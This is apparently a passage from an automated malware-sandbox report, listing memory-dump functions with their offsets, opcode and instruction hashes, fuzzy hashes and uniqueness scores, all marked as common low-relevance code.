              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ded2f3fef7f4b8db09982f83ed8079d8ac0160910d2042280c40f7c252ade6d3
              • Instruction ID: 36c57903020c179751b8ae83df692cf6a8c6e8dd7e1510212400acd60d3d4dd9
              • Opcode Fuzzy Hash: ded2f3fef7f4b8db09982f83ed8079d8ac0160910d2042280c40f7c252ade6d3
              • Instruction Fuzzy Hash: EE318539A002058FDB45DB68C584EADBBF2BF88324F565194DA11AB366D731EC85CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE2F0, Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cdec0388fb8187c61ecdea94f086982293d739fdbf3ca3e31b91c9d47e42943c
              • Instruction ID: 9c1a4f546c452649a342cc4239233c3113ccaed68d9bd04639084817009b40e9
              • Opcode Fuzzy Hash: cdec0388fb8187c61ecdea94f086982293d739fdbf3ca3e31b91c9d47e42943c
              • Instruction Fuzzy Hash: 9D214F32A04115DFCB54DB6985509BEB7FABB98211B50806AD54AE7700D732AD02CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A4511, Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24f99258df06a62be81f8dc51973860eb69c19bbaffaaa1f22e1e8bca0d72e75
              • Instruction ID: 48aac0153985c2553e186dd8a757c98e8aa546eea725e1d17173f25d3d3ba206
              • Opcode Fuzzy Hash: 24f99258df06a62be81f8dc51973860eb69c19bbaffaaa1f22e1e8bca0d72e75
              • Instruction Fuzzy Hash: E411C133E081018BCF04CA58D8101EFB7A69FC6222F14407EA906DB390DEA69D46CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5000, Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0172cebab4179cdaf59fe8178d2b8e8a80a12f57907ced2eb1e612da324a63e5
              • Instruction ID: cc0ad7f67269c3f593c1c1fae5d9eff2c35d17e22ae00234b762560e2ea73d2e
              • Opcode Fuzzy Hash: 0172cebab4179cdaf59fe8178d2b8e8a80a12f57907ced2eb1e612da324a63e5
              • Instruction Fuzzy Hash: 06118132B00256CFCF44EBB8945066E7BE2EB94654B544179D80BDB784EF309D42CBE6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AAEFA, Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a49441fe6955e510445eb1f8653f190e1d7d2a990ec79ad1aaf033453ef6c679
              • Instruction ID: 26c7d203a59439167687019793463a6a62f623aec640ae88b44948075903e804
              • Opcode Fuzzy Hash: a49441fe6955e510445eb1f8653f190e1d7d2a990ec79ad1aaf033453ef6c679
              • Instruction Fuzzy Hash: 46113D73204355CFC3169BA9C900A2CFBA5FF8276572480AFE1049B652D735BD16CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFD69, Relevance: .1, Instructions: 62COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 47ad7db3e3b30d56a2aa929aa6cef75a21e17056bc6bd13371aabc4733a42a6d
              • Instruction ID: 8eb59b7a87ad7983f6cd8253e5d8e167082077059ba28f06512aec80c9aca972
              • Opcode Fuzzy Hash: 47ad7db3e3b30d56a2aa929aa6cef75a21e17056bc6bd13371aabc4733a42a6d
              • Instruction Fuzzy Hash: AB11C23B400108EFCF069F90D809CA9FFB6FB49310B068495E6056B072DB32EA65EF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC5A8, Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4762273d507480d9c05a8fb64d49a1451ebe6a70e83c3f59fdf1f017f689bb9a
              • Instruction ID: 811bbcdea1ff71a6a9234c98cd30c2f6eca3fbf1a3fdd82231438fd51b5ed325
              • Opcode Fuzzy Hash: 4762273d507480d9c05a8fb64d49a1451ebe6a70e83c3f59fdf1f017f689bb9a
              • Instruction Fuzzy Hash: D411A032B001049FD708EB6AC454A6EB7E7EFD97147248069F40ADB750CE32EC12CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE2E1, Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a48dc4b6dbdf38d5f6eb22b8b7a75a86f488eca93d061230eaf204bfab259faf
              • Instruction ID: f037a0758b61c63e814dea03fa24b16dd6b8c28e93933046db0ac44f062507a7
              • Opcode Fuzzy Hash: a48dc4b6dbdf38d5f6eb22b8b7a75a86f488eca93d061230eaf204bfab259faf
              • Instruction Fuzzy Hash: 67113D32A04105DFCB54DF58C5519BEBBFAFB88310B50806AD586E3240D732AD02CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AF628, Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5d9f08bd831acfefba15e437898331b0579e3cc3f83f1e17c3713aeda93efda6
              • Instruction ID: 4cdeb778125b5269932ca7c82289d701465aee3cc772fa0346ff8e8bea0b88b1
              • Opcode Fuzzy Hash: 5d9f08bd831acfefba15e437898331b0579e3cc3f83f1e17c3713aeda93efda6
              • Instruction Fuzzy Hash: 6111D336A08345CBDB25DE64D4447AEFBB2AB84314F14642EC042A7360CA755C86CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC6C8, Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e9a9bdccb450e037392d09c4664f0d38936b2b21036603d22a1b8943d9d4e4e
              • Instruction ID: d14086eabd443b55b076e67919049416b33723d8c71b5dbe7f3d85a6a65fa172
              • Opcode Fuzzy Hash: 4e9a9bdccb450e037392d09c4664f0d38936b2b21036603d22a1b8943d9d4e4e
              • Instruction Fuzzy Hash: 76110131208701CBC355E739C55052ABBA7AFE2214354886FA14AEF2A1CF32EC03CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC6D8, Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c0c2aa50d074113a21b5dcc121293719b70b954dd507f6dbe480a3a8d8b60686
              • Instruction ID: 6b85b128118af142844e3fecdf14e27c4f93b4fadf23fd92b84b629ef1a01f0f
              • Opcode Fuzzy Hash: c0c2aa50d074113a21b5dcc121293719b70b954dd507f6dbe480a3a8d8b60686
              • Instruction Fuzzy Hash: 4411BF31308600CBC359E739C59062EBB939BE2614754882EA14B9B290CF72EC43CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0155087C, Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.910139948.0000000001550000.00000040.00000040.sdmp, Offset: 01550000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ca484ec050a3002f49a90b0f6b2862de6e533e131d3b63f1b84a7ccff3612eb
              • Instruction ID: 54550b166efb2cac5c86ee4a1371d6a3b08189a30015add96a3c550b0beb5ab4
              • Opcode Fuzzy Hash: 1ca484ec050a3002f49a90b0f6b2862de6e533e131d3b63f1b84a7ccff3612eb
              • Instruction Fuzzy Hash: 4A119035204684DFD755CB18C550F2ABBE1BB88718F24C9AEF9490F686C77AD813CA91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFD78, Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c22c5d1388de042f1bc68c0c708806b2d6d55c5987429c7ceefff367bec41bb
              • Instruction ID: 95d6f7b75253553cc312a42c04fa9e579af2a75edd0a8aa7c8fc41f97a83f7ab
              • Opcode Fuzzy Hash: 2c22c5d1388de042f1bc68c0c708806b2d6d55c5987429c7ceefff367bec41bb
              • Instruction Fuzzy Hash: A411903B410118EFCF469F90D809CA9BFB6FF49311B068495E6056B032CB72E965EF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0070, Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c6ee2a0dc3059c5e6c757dcf8418002c6058ad38807b83ec944dc592868e362
              • Instruction ID: 7f469b24f652470245e339fe528acd988bcf1a410cfc7123e0fb348963d6d368
              • Opcode Fuzzy Hash: 6c6ee2a0dc3059c5e6c757dcf8418002c6058ad38807b83ec944dc592868e362
              • Instruction Fuzzy Hash: DF118675B04244AFDB40DFBEC84099BFBF6BF8C250F10407AD209D7221D672A811CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A78D8, Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d70a59153fb904a023a3b84edf9486ac7b8b1d92a142497d5c771798ffa8ad61
              • Instruction ID: 480a98470c259dc3e027dbe9cc3687d211a3b554c8883a2a94ba714d2837969f
              • Opcode Fuzzy Hash: d70a59153fb904a023a3b84edf9486ac7b8b1d92a142497d5c771798ffa8ad61
              • Instruction Fuzzy Hash: 9711C132D08244DFDB11CF68D8046E9BBF2FF49310F1080AAD112A76A0D735AD46CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC2C0, Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 73ccee19cf06c03c93d5441ced88b5b7ada04513b89aaf2d73949e88080614ef
              • Instruction ID: 5489e4088a169968e476a685cc457343337a156a59ed1548d4be6b06698ed50b
              • Opcode Fuzzy Hash: 73ccee19cf06c03c93d5441ced88b5b7ada04513b89aaf2d73949e88080614ef
              • Instruction Fuzzy Hash: AD110675B002109FE3859B39A45873D3B97F7D9610F0A04A9F906CB394CE74AC02CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AD9F9, Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6afab4d7b5ea0936ba52625bec62f4397f2702941f82c3dcdb0ab8760fefb7c1
              • Instruction ID: 0676dd2f1dcc814404bb3fb1a784f9bb693625aa599476c7af6300eeedf038ec
              • Opcode Fuzzy Hash: 6afab4d7b5ea0936ba52625bec62f4397f2702941f82c3dcdb0ab8760fefb7c1
              • Instruction Fuzzy Hash: 6E0126317043119FCB145BB6845866EBBEAAFC9214754447EE406D7365CD319C02C764
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A11DF, Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f3b631d1a8f459327ef932e8184251f1359d64e0187cd9d922338f827f8c4c0
              • Instruction ID: b62a5097ef9f6e22669201aab6ab9e00bf6df37663a03be240e3e5b9d5e369ae
              • Opcode Fuzzy Hash: 5f3b631d1a8f459327ef932e8184251f1359d64e0187cd9d922338f827f8c4c0
              • Instruction Fuzzy Hash: 7411A13170D2808FC725DB28D0689A97FE6AF87210B1541EBE046CF275DFB98C4ACB52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A4FF0, Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3af5bc7aca772da399b4bd43ac5e4d795926615ff1acb8fdb88db3f265a6fb9
              • Instruction ID: 986535c2e31251d0c66fa1f69d22be4f432004db50df45634cba186a220e8ff6
              • Opcode Fuzzy Hash: f3af5bc7aca772da399b4bd43ac5e4d795926615ff1acb8fdb88db3f265a6fb9
              • Instruction Fuzzy Hash: 7F01C032E04206CFCB90DAB4A8512FE7BE1EB94260F14452BC40AE7640EB755D42CFE2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A4789, Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e87529046eb6da3ab3e03d97bdc32f7dfd6b54f2992f0303a1a37d740632742
              • Instruction ID: 4b51bc921d0cfaa5c4fe735159ea0ea64e8452859dd8cc907bc109c3043bc9ad
              • Opcode Fuzzy Hash: 0e87529046eb6da3ab3e03d97bdc32f7dfd6b54f2992f0303a1a37d740632742
              • Instruction Fuzzy Hash: E8014431E0421A8FDB94DFB994542EE77E6EB85320F20847EC509E7240EA355D43DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A05B9, Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b3449ce4adc3f20046ea88180488278ff4f5b694b33e465e4ecf9729ac221f64
              • Instruction ID: 23e91b8139fbafb562ad6dbc303d60dce3e29bf8750262c9fe79d21c240e9423
              • Opcode Fuzzy Hash: b3449ce4adc3f20046ea88180488278ff4f5b694b33e465e4ecf9729ac221f64
              • Instruction Fuzzy Hash: FA0126317042100FCB49623E64516FE678BABC5A5871C845FE109DF391CD78AC4347E2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014CAEC0, Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.910005449.00000000014C2000.00000040.00000001.sdmp, Offset: 014C2000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a248a88a8fd9798ce2b1ff5ce09bf89b2dc26fbc8fc661ea9744826634c8c2e
              • Instruction ID: 0dccee3cf4af8112f1c35cce3870bbbd63fc105fe230f8bd823556cbb4ce04bf
              • Opcode Fuzzy Hash: 1a248a88a8fd9798ce2b1ff5ce09bf89b2dc26fbc8fc661ea9744826634c8c2e
              • Instruction Fuzzy Hash: F511ECB5608305AFD350CF09D840A5BFBE8EB88660F14891EFD9997311D231E9048FA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A238F, Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 345a3f351f1b7d876cb929199cc30d64769e89ce8e9cbd5154d4ae8857c39dcc
              • Instruction ID: cb65bdebecac5c6396f23cd073e0a9af1545c95dae87bba32726e33474a2bc57
              • Opcode Fuzzy Hash: 345a3f351f1b7d876cb929199cc30d64769e89ce8e9cbd5154d4ae8857c39dcc
              • Instruction Fuzzy Hash: BE114875D8825ACFCB28CFA4D5606AEBBB2FB44300F10456AD506A7644DB754C83CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7840, Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 564362e853732a0e001f28120854921701cf0f9ef7d48245fb7df8f9469082cf
              • Instruction ID: 584ee18dc93196a954f817bb0acb893e880fe6802690d64e6087c07834e51d7a
              • Opcode Fuzzy Hash: 564362e853732a0e001f28120854921701cf0f9ef7d48245fb7df8f9469082cf
              • Instruction Fuzzy Hash: 70014032A042058BD7A8CA6489546BEBBF2EB84314F24457EC406A7694CB75BD07CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7850, Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 248c628320f4f3f9fda2d0b9bb88c9f4f961ffec26ce0f3a1e9596d8a5ed848e
              • Instruction ID: ceb156275d140c0b21bff1b512eac0e8bb8682b4592436ab08e2cd0a9dfe8dfa
              • Opcode Fuzzy Hash: 248c628320f4f3f9fda2d0b9bb88c9f4f961ffec26ce0f3a1e9596d8a5ed848e
              • Instruction Fuzzy Hash: F3015A33A042049BDBA8DA64C990ABFBBB2EB84314F14457EC517A7680CB71BD06CFD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA268, Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56b79066ce4c22586aa32ee04e017389f49bd042414d5cc83c1467a400bb81ca
              • Instruction ID: 3252668a2d33233daaa55efeed2e1225aae13956ee10ca5e1c0cf409ff4f8a2e
              • Opcode Fuzzy Hash: 56b79066ce4c22586aa32ee04e017389f49bd042414d5cc83c1467a400bb81ca
              • Instruction Fuzzy Hash: 0F015232A082059BDB34DAD4C5507BEBBB3AB84214F18456FC417A7641EB72AD52CFD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADA08, Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2628f72856614b3181b242ee5ffa6da162b6cd2c5293e374f932336714d33464
              • Instruction ID: 04a94ca9f66011a1f799f749eba3b372599a9f2c90dc68817dc75af53489f46b
              • Opcode Fuzzy Hash: 2628f72856614b3181b242ee5ffa6da162b6cd2c5293e374f932336714d33464
              • Instruction Fuzzy Hash: 5F01F2327002219FCB242BB6985866FBAEAFBC9624750483EE40BD3754DD32DC0287B4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7288, Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 610be0e54e1bbe156f4bfbef4c6c5a7b562f52688c87831eca3a1335e730e197
              • Instruction ID: 66ec0a3a6371c81fcb4d9b4b0d74dd14adbfeff21b27f4c74868e5514c67cee3
              • Opcode Fuzzy Hash: 610be0e54e1bbe156f4bfbef4c6c5a7b562f52688c87831eca3a1335e730e197
              • Instruction Fuzzy Hash: E001D67270C3114BC7559B6D5C90AA86B87AF85230368475BE11DDF2D9ED658D0383A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA770, Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c7e3bdff5bcbd10008020b29465d0e03c10b4049103dc02aff38549b653d596b
              • Instruction ID: 807ef613f1002759a7b54df462934da6df53bf8494756e528843e6dd9c542f93
              • Opcode Fuzzy Hash: c7e3bdff5bcbd10008020b29465d0e03c10b4049103dc02aff38549b653d596b
              • Instruction Fuzzy Hash: 1F018431F002068FEB90EBB4A8097AE7BF1EB84260F10417BD905D3640EB799951CFE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFE91, Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 33391d60e6921d5cdcfe56c082a288d03183b7a6558e7df0c7692c30f65820b1
              • Instruction ID: 49f315eeb7a8d402b38ecf561bf4dc241a3538a803ba227c40336fa9dce3d325
              • Opcode Fuzzy Hash: 33391d60e6921d5cdcfe56c082a288d03183b7a6558e7df0c7692c30f65820b1
              • Instruction Fuzzy Hash: E601C03A608281DBD764CB14E018761FBEBFB81301F10905AE4038BA96CB749C82CF53
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA780, Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd0242b8f6571e674916aa653912e4206139e61a0710c1f9101f8a17dd705866
              • Instruction ID: 4b7fabae02325ff960873841890eac60fc5529cad4faf20ae2f7829dbdac7caf
              • Opcode Fuzzy Hash: fd0242b8f6571e674916aa653912e4206139e61a0710c1f9101f8a17dd705866
              • Instruction Fuzzy Hash: 94018F32E002098FDB90DBB8E8097AEBBF4EB84210F10417BD919E3640EB349911CFE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA260, Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91929584ef525b5f940aa1b623817db50ec2349a016e80d3c5aa18dd3d20368c
              • Instruction ID: ceac8a5278f35de01bf3c4212802c25e35ba80f1798b8f724df901731144d244
              • Opcode Fuzzy Hash: 91929584ef525b5f940aa1b623817db50ec2349a016e80d3c5aa18dd3d20368c
              • Instruction Fuzzy Hash: 3F015232A082058BD734DAE4C5547BE7BF39B84210F18456FC406A7741EB669D92CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A05C8, Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ecaf702182b14e167b285a1e5c721e72b716d4adcccb75c7b3ca95fc56e28980
              • Instruction ID: 607fa4f4582dc7a4037d9679b2d6fdd43e6c24314e6b97fc2bbfba325c8bf463
              • Opcode Fuzzy Hash: ecaf702182b14e167b285a1e5c721e72b716d4adcccb75c7b3ca95fc56e28980
              • Instruction Fuzzy Hash: D7F0BB317001241FDA09767E54516BFA28FABD8958758441FF10AEF394CDB9BC4347E6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5CE9, Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0da50c80f6612a0c9ca2dc1af3aec5b82492edc1682d1617aef0a2a69c527c2c
              • Instruction ID: 2dbf639f1a398acdfb9d15796feeeaf12118488a868854984c417ec7d4d46cd1
              • Opcode Fuzzy Hash: 0da50c80f6612a0c9ca2dc1af3aec5b82492edc1682d1617aef0a2a69c527c2c
              • Instruction Fuzzy Hash: D30126767046A00FCB55B77924186BE77D62FA2901309809FD44BEB392CE214C02CBAA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A9F2F, Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b52442ac721e02f89c82690a6077cc44d55a6dbb83256f8dd8ea4e47b7b7a41
              • Instruction ID: e3a18f558843026c38eb2f1402d0e955b31b342e7161950a4c1db7157e06b835
              • Opcode Fuzzy Hash: 9b52442ac721e02f89c82690a6077cc44d55a6dbb83256f8dd8ea4e47b7b7a41
              • Instruction Fuzzy Hash: 73F0223170C3504BCB55AA6D98807A877876BC13317B8826FE10DDF3D8CE698C078BA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A67C8, Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: edf23ec961a9f332a028176312d6027af599226d53f2241004fa762434bf56de
              • Instruction ID: c7faebad7b15a87ba1602e2b5522733be72d0710f55e4d134c80da98c152c261
              • Opcode Fuzzy Hash: edf23ec961a9f332a028176312d6027af599226d53f2241004fa762434bf56de
              • Instruction Fuzzy Hash: 62014BB2E002199FEB50DBB9E8417AEBBF8EB84610F10417AD509D3680EB349D55CFE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A67B9, Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cb7c884f316b8703a9f0c99a329ed31d5ceb8ccb33f473e5b3b16f57049c286
              • Instruction ID: aeae10581b836de62c00539986adeb47f6fad890ae7540173aff269a7ed317dd
              • Opcode Fuzzy Hash: 6cb7c884f316b8703a9f0c99a329ed31d5ceb8ccb33f473e5b3b16f57049c286
              • Instruction Fuzzy Hash: FB0171B1E402159FEBA0DB78D855BAABBF5FB44710F14812AD509D7280EB744D45CFE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA8F0, Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72f5282e167e88a2ee980aa0186bccee4970bb11cecb6d1d269d7936137d9da4
              • Instruction ID: d61cdafac53699d8c453a7494c7ef56d3faa242258f1df6c7b39928ace1e9ae8
              • Opcode Fuzzy Hash: 72f5282e167e88a2ee980aa0186bccee4970bb11cecb6d1d269d7936137d9da4
              • Instruction Fuzzy Hash: FA012F31200300CFC740EBB8D80A81CBBA7EB8521030541ABEA06DB3A4EF70ED02CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A4710, Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe3df47f8e0e1239c520ae2ad6ae64ad234447182dbf62d52c4c02b53cdfbaa6
              • Instruction ID: fa01cdd0f379c32b84d4ef1c5fefa65a2f806ab8cbc871fca69d024345479970
              • Opcode Fuzzy Hash: fe3df47f8e0e1239c520ae2ad6ae64ad234447182dbf62d52c4c02b53cdfbaa6
